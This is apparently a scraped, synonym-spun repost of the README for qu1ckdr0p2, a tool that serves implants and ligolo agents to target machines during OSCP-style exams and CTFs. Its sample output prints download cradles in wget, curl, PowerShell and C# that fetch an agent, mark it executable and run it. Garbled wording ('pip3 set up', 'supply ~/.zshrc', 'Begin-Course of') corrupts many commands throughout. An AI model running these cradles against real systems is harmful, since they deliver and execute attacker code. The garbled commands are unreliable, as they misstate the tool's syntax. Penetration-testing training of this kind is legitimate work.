13.8 C
Tuesday, October 31, 2023

Quicky Serve Recordsdata Over Http Or Https Utilizing Flask

Quickly host payloads and post-exploitation bins over HTTP or HTTPS.

Designed for use on exams like OSCP / PNPT or CTFs HTB / and so forth.

Pull requests and points welcome. As are any contributions.

Qu1ckdr0p2 comes with an alias and search characteristic. The instruments are positioned within the qu1ckdr0p2-tools repository. By default it would generate a self-signed certificates to make use of when utilizing the --https choice, precedence can be given to the tun0 interface when the webserver is operating, in any other case it would use eth0.

The frequent.ini defines the mapped aliases used inside the --search and -u choices.

When the webserver is operating there are a number of obtain cradles printed to the display screen to repeat and paste.

pip3 set up qu1ckdr0p2

echo "alias serv='~/.native/bin/serv'" >> ~/.zshrc
supply ~/.zshrc


echo "alias serv='~/.native/bin/serv'" >> ~/.bashrc
supply ~/.bashrc

serv init --update

$ serv serve -f implant.bin --https 443
$ serv serve -f file.instance --http 8080

$ serv --help            
Utilization: serv [OPTIONS] COMMAND [ARGS]...

Welcome to qu1ckdr0p2 entry level.

--debug Allow debug mode.
--help Present this message and exit.

init Carry out updates.
serve Serve recordsdata.

dynamic quantity -f, –file FILE Serve a file –http INTEGER Use HTTP with a customized port –https INTEGER Use HTTPS with a customized port -h, –help Present this message and exit.” dir=”auto”>

$ serv serve --help
Utilization: serv serve [OPTIONS]

Serve recordsdata.

-l, --list Record aliases
-s, --search TEXT Search question for aliases
-u, --use INTEGER Use an alias by a dynamic quantity
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a customized port
--https INTEGER Use HTTPS with a customized port
-h, --help Present this message and exit.

$ serv init --help       
Utilization: serv init [OPTIONS]

Carry out updates.

--update Verify and obtain lacking instruments.
--update-self Replace the software utilizing pip.
--update-self-test Used for dev testing, installs unstable construct.
--help Present this message and exit.

$ serv init --update-self

The mapped alias numbers for the -u choice are dynamic so you do not have to recollect particular numbers or ever sort out a software title.

ligolo [→] Path: ~/.qu1ckdr0p2/home windows/agent.exe [→] Alias: ligolo_agent_win [→] Use: 1 [→] Path: ~/.qu1ckdr0p2/home windows/proxy.exe [→] Alias: ligolo_proxy_win [→] Use: 2 [→] Path: ~/.qu1ckdr0p2/linux/agent [→] Alias: ligolo_agent_linux [→] Use: 3 [→] Path: ~/.qu1ckdr0p2/linux/proxy [→] Alias: ligolo_proxy_linux [→] Use: 4 (…)” dir=”auto”>

$ serv serve --search ligolo               

[→] Path: ~/.qu1ckdr0p2/home windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1

[→] Path: ~/.qu1ckdr0p2/home windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2

[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3

[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4

$ serv serve --search ligolo -u 3 --http 80

[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP handle:
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to stop

[→] URL:

[↓] csharp:
$webclient = New-Object System.Web.WebClient; $webclient.DownloadFile('', 'c:windowstempagent'); Begin-Course of 'c:windowstempagent'

[↓] wget:
wget -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] curl:
curl -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] powershell:
Invoke-WebRequest -Uri -OutFile c:windowstempagent; Begin-Course of c:windowstempagent

â § Internet server operating


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